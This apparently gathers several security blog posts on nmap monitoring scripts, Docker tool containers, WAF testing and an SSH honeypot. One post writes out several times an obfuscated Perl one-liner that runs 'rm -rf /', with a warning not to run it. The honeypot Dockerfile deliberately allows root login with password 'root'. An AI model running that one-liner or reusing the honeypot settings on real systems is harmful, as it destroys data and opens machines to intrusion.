Continuous Network Monitoring With Slack Alerting

As I have talked about before, “You can’t defend what you don’t know exists”, so today, while sitting around trying to recover from walking pneumonia, I wrote slackmap to continually nmap a network and post the differences to Slack:

Configuration is amazingly easy. I run a copy of this on a $5 a month DigitalOcean Droplet for an external view and on a Raspberry Pi for internal scanning.

  • Create a Slack bot and copy its API key.
  • Update and install the needed software on the server:
    sudo apt-get update && sudo apt-get dist-upgrade
    sudo apt-get install ssmtp nmap xsltproc
  • Create the necessary folders:
    sudo mkdir /nmap/
    sudo mkdir /nmap/diffs
  • Copy this to /nmap/slackmap.sh and add the Slack bot API key on line 8:

https://gist.github.com/jgamblin/7d64a284e5291a444e12c16daebc81e0

  • Copy this line to your crontab to run the scan every 15 minutes (use a longer interval for bigger networks):
    */15 * * * * /nmap/slackmap.sh
  • Enjoy a new level of network visibility. : )
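The Slack-posting half of this setup, written here as an added example and not the code in the gist above: it takes the ndiff output file that the scan step produces and sends it through the Slack chat.postMessage API with a bot token. SLACK_TOKEN and SLACK_CHANNEL are placeholders you set in the environment.

```shell
#!/bin/sh
# Added example: post an ndiff result file to Slack. Not the gist's code.
# SLACK_TOKEN (bot token) and SLACK_CHANNEL are placeholders; override via env.
SLACK_TOKEN="${SLACK_TOKEN:-xoxb-PLACEHOLDER}"
SLACK_CHANNEL="${SLACK_CHANNEL:-#netmon}"

# json_escape STRING: escape backslash, double quote and newline so the raw
# ndiff text can sit inside a JSON string value.
json_escape() {
    printf '%s' "$1" \
        | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g' \
        | awk '{ printf "%s%s", sep, $0; sep = "\\n" }'
}

# slack_payload DIFF_TEXT: build the chat.postMessage request body.
slack_payload() {
    printf '{"channel":"%s","text":"%s"}' "$SLACK_CHANNEL" "$(json_escape "$1")"
}

# post_diff DIFF_FILE: send the file to Slack; skips empty files. Call it where
# the scan script decides a change happened (ndiff exit status 1).
post_diff() {
    [ -s "$1" ] || return 0
    curl -sS -X POST https://slack.com/api/chat.postMessage \
        -H "Authorization: Bearer $SLACK_TOKEN" \
        -H 'Content-type: application/json; charset=utf-8' \
        --data "$(slack_payload "$(cat "$1")")"
}
```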

Continuous Network Monitoring

I am often asked “What is the easiest thing companies can do to secure their networks?” and my answer is always “Know what is on your network.” While that is simple advice, it is a lot harder to implement. One company I was working with was looking at a system to do continuous network monitoring (read: scheduled nmap scans) for $40,000 a year.
After I cried for the state of my industry, I told them I could do this for them with a small shell script, a $5 a month DigitalOcean Droplet and a free SendGrid account.
Here is how I did it:

  • Created a free SendGrid account.
  • Spun up a $5 a month DigitalOcean Ubuntu Droplet.
  • Added a nmaper.company.com DNS record to make it perfectly clear what the box was doing.
  • Updated and installed needed software:
    sudo apt-get update && sudo apt-get dist-upgrade
    sudo apt-get install ssmtp nmap xsltproc
  • Created necessary folders:
    mkdir /root/nmap/
    mkdir /root/nmap/diffs
  • Edit /etc/ssmtp/ssmtp.conf with this:
    [email protected]
    mailhub=smtp.sendgrid.com
    rewriteDomain=
    [email protected]
    UseSTARTTLS=YES
    AuthUser=jgamblin
    AuthPass=password
    FromLineOverride=YES
  • Copy this to /root/nmap/scan.sh:
    #!/bin/sh
    # Hosts to scan and the nmap options for every run (-F: top 100 ports,
    # --open: report only open ports, so the diff covers reachable services only)
    TARGETS="54.226.178.109 scanme.nmap.org"
    OPTIONS="-v -sV -T4 -F --open"
    date=$(date +%F%T)
    cd ~/nmap/diffs || exit 1
    # Write the scan in all three output formats; ndiff below needs the XML one
    nmap $OPTIONS $TARGETS -oA scan-$date > /dev/null
    # Mail the diff through ssmtp (configured above to relay via SendGrid)
    email()
    {
    /usr/sbin/ssmtp [email protected] <<EOF
    From: [email protected]
    Subject: nmap ndiff $(date +"%Y-%m-%d") *** NDIFF RESULTS ***
    $(cat diff-$date)
    EOF
    }
    # ndiff exits 1 when the two scans differ, 0 when identical and 2 on error,
    # so only a real change triggers the email
    if [ -e scan-prev.xml ]; then
    ndiff scan-prev.xml scan-$date.xml > diff-$date
    [ "$?" -eq "1" ] && email
    fi
    # Point scan-prev.xml at this run so the next run diffs against it
    ln -sf scan-$date.xml scan-prev.xml
  • Test it (add cat diff-$date to the bottom of the script to see the output).
  • Add a cron job to run it every 15 minutes (or every hour for bigger networks).
  • Talk your boss into buying you something awesome with the $39,970 in savings.

It was as simple as that and I put this together in an afternoon.  Up next is to build a Slackbot and an  to deliver the differences to their slack channel.

Ubuntu Remote Desktop On Digital Ocean

I use DigitalOcean for the majority of my testing, and from time to time I need a desktop environment to run some of my tools (like Burp). After spending much more time than I want to admit, I have it down to these 10 commands to bring up an Ubuntu + MATE + XRDP desktop on an Ubuntu Droplet:
sudo apt-get update && sudo apt-get dist-upgrade -y
sudo apt-get install --no-install-recommends ubuntu-mate-core ubuntu-mate-desktop -y
sudo apt-get install mate-core mate-desktop-environment mate-notification-daemon xrdp -y
adduser burp
usermod -aG admin burp
usermod -aG sudo burp
su - burp
echo mate-session > ~/.xsession
sudo cp /home/burp/.xsession /etc/skel
sudo service xrdp restart
From there you can use any RDP viewer to connect to your droplet.

‘rm -rf /’ still works on OSX

Earlier this week someone sent me this one-line Perl script (that you shouldn’t run):
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Due to some really clever code obfuscation, it runs rm -rf /.
You can deobfuscate (is that a word?) it with this:
perl -e 's;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;print "$_\n"'
While trying to figure out how this code worked, I stumbled upon the fact that OSX does not require --no-preserve-root, which has been required since version 6.4 of GNU Core Utilities, released in 2006.
Here is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see' on Ubuntu 16.10:
Here is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see' on MacOS 10.12:
This seems like a pretty big oversight by the Apple team and I have filed a bug report but haven’t heard anything yet.
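For platforms whose rm lacks the GNU --preserve-root default described above, the same refusal can be put in front of rm in the shell. This wrapper is an added example, not from the original post: it blocks a recursive delete whose target is the root directory unless --no-preserve-root is given explicitly, strips that flag (the macOS rm would reject it) and passes everything else through to the real rm.

```shell
#!/bin/sh
# Added example: emulate GNU rm's --preserve-root default on systems without it.
safe_rm() {
    allow_root=0
    recursive=0
    for arg in "$@"; do
        case "$arg" in
            --no-preserve-root) allow_root=1 ;;
            --recursive)        recursive=1 ;;
            --*)                ;;              # other long options: not recursion
            -*[rR]*)            recursive=1 ;;  # short option cluster containing r/R
        esac
    done
    if [ "$recursive" -eq 1 ] && [ "$allow_root" -eq 0 ]; then
        for arg in "$@"; do
            case "$arg" in
                -*)     ;;   # an option, not a path
                *[!/]*) ;;   # has a non-slash character, so it is not "/" or "//"
                *) echo "safe_rm: refusing to remove '$arg' without --no-preserve-root" >&2
                   return 1 ;;
            esac
        done
    fi
    # Drop --no-preserve-root before calling the real rm, which may not know it
    for arg in "$@"; do
        shift
        [ "$arg" = "--no-preserve-root" ] || set -- "$@" "$arg"
    done
    command rm "$@"
}
```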

WAF Testing With Random User Agents.

Recently I have been working with some NGFW tools to automatically detect and block when someone is scraping, brute forcing or “load testing” your website. I quickly ran into a problem where none of the tools I use would let me quickly change user agents, so I put together a couple of quick scripts that pick one of 7500 valid user agents from this file.
First I went with the old standby of curl, which does the job, but I was only able to do 10 requests in 4 seconds.
Here is what the output of curl.sh looks like:

That was not going to be fast enough for my testing needs, so I switched to Apache Bench and am able to do 1,000 requests in 2 seconds, which was what I needed to do proper testing.
Here is what the output of ab.sh looks like:

All the scripts are in this GitHub Repo.
As always:  Use these for good, not bad.
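The detection-side counterpart of the test above, as an added example that is not part of the original post or its repo: a client rotating through thousands of user agents stands out in a web server log as one source IP presenting many distinct User-Agent strings. The log lines are constructed samples in Apache combined format; the threshold is a parameter.

```shell
#!/bin/sh
# Added example: flag source IPs that use more than THRESHOLD distinct
# User-Agent strings in a combined-format access log.

# Constructed sample log: 10.0.0.5 rotates user agents, 192.0.2.10 does not.
sample_log() {
cat <<'EOF'
10.0.0.5 - - [19/Oct/2016:21:15:22 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/53.0"
10.0.0.5 - - [19/Oct/2016:21:15:22 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Macintosh) Safari/602.1"
10.0.0.5 - - [19/Oct/2016:21:15:23 +0000] "GET / HTTP/1.1" 200 512 "-" "curl/7.47.0"
10.0.0.5 - - [19/Oct/2016:21:15:23 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux) Firefox/49.0"
192.0.2.10 - - [19/Oct/2016:21:15:24 +0000] "GET /about HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/53.0"
192.0.2.10 - - [19/Oct/2016:21:15:25 +0000] "GET /contact HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/53.0"
EOF
}

# ua_rotators THRESHOLD < access.log
# Prints "ip distinct_user_agent_count" for every IP with more than THRESHOLD
# distinct user agents. Splitting on the double quote makes the User-Agent
# the sixth field in combined format, regardless of spaces inside it.
ua_rotators() {
    awk -v max="$1" -F'"' '
        { split($1, a, " "); ip = a[1]; ua = $6
          if (!((ip, ua) in seen)) { seen[ip, ua] = 1; count[ip]++ } }
        END { for (ip in count) if (count[ip] > max) print ip, count[ip] }'
}

# Usage with the constructed sample: sample_log | ua_rotators 2
```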

RaiNmap Container

I use nmap all the time at work and recently came across rainmap-lite, an amazing web interface for nmap that lets you easily schedule scans and email the results. I wanted to share it with a class I am teaching, so I did what I have been doing lately and put it into a Docker container:
Running it is as simple as:
docker run -ti -p 8080:8080 --name rainmap jgamblin/rainmap
Then access:
http://yourip:8080/console 
You can now run a ton of nmap scans and get the results emailed to you and your team.
Here is the Dockerfile:
FROM ubuntu:latest
RUN apt-get update && apt-get install sqlite3 git nmap python-pip  -y
RUN pip install --upgrade pip
RUN pip install lxml
RUN pip install Django
RUN git clone https://github.com/cldrn/rainmap-lite
WORKDIR /rainmap-lite/rainmap-lite/
ADD  run.sh /rainmap-lite/rainmap-lite/run.sh
RUN chmod 777 /rainmap-lite/rainmap-lite/run.sh
CMD ./run.sh

Here is the run.sh:
#!/bin/bash
# Move the upstream default port 8000 to the 8080 exposed by the container
sed -i "s/8000/8080/g" "nmaper-cronjob.py"
# Replace the placeholder values in the cron job with the user's own settings
echo What is your public IP address?
read ip
sed -i "s/127.0.0.1/$ip/g" "nmaper-cronjob.py"
echo What is your SMTP user name?
read user
sed -i "s/[email protected]/$user/g" "nmaper-cronjob.py"
echo What is your SMTP password?
read pass
sed -i "s/yourpassword/$pass/g" "nmaper-cronjob.py"
echo What is your SMTP address?
read smtp
sed -i "s/smtp.gmail.com/$smtp/g" "nmaper-cronjob.py"
# Initialise the Django database, load the scan profiles and create the admin user
python manage.py migrate
python manage.py loaddata nmapprofiles
python manage.py createsuperuser
# Run the web interface in the background and the scan scheduler in a loop
python manage.py runserver 0.0.0.0:8080 &
while true
do
python nmaper-cronjob.py
sleep 15
done

Protip:  SendGrid offers a free SMTP server. 

WebSnort Docker Container

One of the first things I like to do when I start looking at a PCAP during an investigation is run it through snort to see if it finds anything suspicious. You can easily do this at the command line with snort -dv -r test.pcap, but the output is not great.
I have been using a tool called websnort for better output recently and decided it was time to put it into a Docker container for easy portability.
To run it:
docker run -d -p 8080:8080 jgamblin/websnort
If you want to build your own, the Dockerfile is:
FROM ubuntu:latest
ENV DEBIAN_FRONTEND noninteractive
RUN apt-get update && apt-get install python-pip snort -y
RUN chmod a+r /etc/snort/snort.conf
RUN pip install websnort
CMD websnort
Protip: malware-traffic-analysis.net has great PCAPs for testing your security tools.

Honeyfiles from my SSHoneypots

My friends at DigitalOcean were nice enough to give me a generous amount of credit on their cloud platform to do some security research with so I decided to do the most reckless thing I could think of and run a full ssh honeypot on the internet.
The build-out is pretty simple: it is the SSHoneypot Docker container I wrote, on a Debian droplet with all outbound traffic blocked so that in theory not much damage can be done.
Surprisingly, it has taken a few days for people to start exploiting the boxes, but when I got up this morning 2 of the boxes had been “hacked”.
In order to share these findings with the community I will copy all files written to these honeypots to honeyfiles.jgamblin.com.
I have a long way to go with this project, as way too much of it is manual now. I need to invest the time to automate notification, moving the files to the web server and starting a new container.
If you are interested in full pcaps or any of the actual exploited SSHoneypot containers, reach out to me on Twitter at @jgamblin and I will be glad to share.

SSHoneypot*

I am at Security Summer Camp this week and you always hear about how dangerous these networks are with no real proof, so I decided to see how dangerous they are*. I built the most insecure Docker container I can think of. It runs SSHD with the root password set to root* to see what happens when I expose them to the blackhat and defcon networks.
I put the container here: jgamblin/sshoneypot
If you want to build and modify your own here is my base dockerfile:
FROM bashell/alpine-bash:latest
RUN apk update && apk upgrade
RUN apk add openssh openssh-sftp-server byobu tmux && \
/bin/sed -i -e 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config && \
/usr/bin/ssh-keygen -A && \
echo "source /etc/profile.d/color_prompt" > /etc/skel/.bashrc && \
cp /etc/skel/.bashrc /root/.bashrc && \
echo "root:root" | chpasswd && \
su - root -c "byobu-launcher-install"
EXPOSE 22
CMD ["/usr/sbin/sshd", "-D", "-e"]
I have been running it on a DigitalOcean droplet for a few hours and, surprisingly, none of the bots have been successful yet.
I will have a blog post next week with full pcaps and copies of the containers for any that have successful logins.
*This is like a really bad idea.  

The Security Summer Camp Talks I Want To See…

I took some time tonight and read through the Security Summer Camp (BSidesLV, Blackhat and Defcon) schedules and picked the talks from this year that I think will be the best and that I do not want to miss.
I ended up with these 16 talks I am going to make a special point to see next week:

BSidesLV

Managing Security with the OWASP Assimilation Project.
I want to see how Alan is using this OWASP project and how it compares to commercial CMDBs.
Automation of Penetration Testing and the future.
I am really interested in this subject as security is seriously lagging behind in the automation arms race and I think it will be the hottest trend in security over the next year.
How to Get and Maintain your Compliance without ticking everyone off.
The outline for this talk is a little sparse but I am interested in seeing what these guys come up with since I know them and am interested in this subject.
How to travel to high-risk destinations as safely as possible.
Ryan will do an amazing job on this talk but I am going to go to this talk to see how many of these things I can steal for my own OpSec.
A Peek Behind Vegas Surveillance.
Um… because why not? I love Oceans 11.
Automation Plumbing.
Another automation talk…. I sense a trend.

BlackHat

An insider’s guide to cyber-insurance and security guarantees.
I am interested in this subject in general and how it will shape security in the next few years.
Cyber war in perspective: analysis from the crisis in ukraine
I have read a couple of books and watched Winter on Fire about this conflict, so it will be interesting to hear about it from a cyber-war perspective.

Defcon

Universal Serial aBUSe: Remote physical access attacks.
This is going to be the best and most talked about talk at Defcon. If Dominic brings the tool outlined in the talk (and he will) you will be reading about this for the next month.
Realtime bluetooth device detection with Blue Hydra
I love hacking bluetooth devices and Blue Hydra is an amazing new tool.
BSODomizer HD: A mischievous FPGA and HDMI platform for the (m)asses
These guys know so much about hacking hardware and this talk and tool is going to be amazing.  I hope Joe has a kit together by Defcon so I can buy it.
101 Ways to Brick your Hardware
Joe FitzPatrick is one of the smartest guys I know and watching this talk on his failures will be entertaining, educational and inspiring. Amazing and truly talented people can always laugh at themselves.
Picking Bluetooth Low Energy Locks from a Quarter Mile Away
um…. are you telling me you wouldn’t want to see this?
Hacking Hotel Keys and Point of Sale systems
I am glad I will be checked out of my room by the time this talk is given.

Other

Sun, Sin, Security: IOActive
IOActive does an amazing job with their event every year and they will have some amazing talks.
Securing the Internet of Things (SIOT)
I love IOT security and I will be speaking at this event.
I will just leave this here for discussion at another time but I am probably skipping the Blackhat badge next year:

Conference   Badge Cost   Talks   Cost Per Talk
BSidesLV     $0.00        6       $0.00
BlackHat     $2,295.00    2       $1,147.50
Defcon       $240.00      6       $40.00
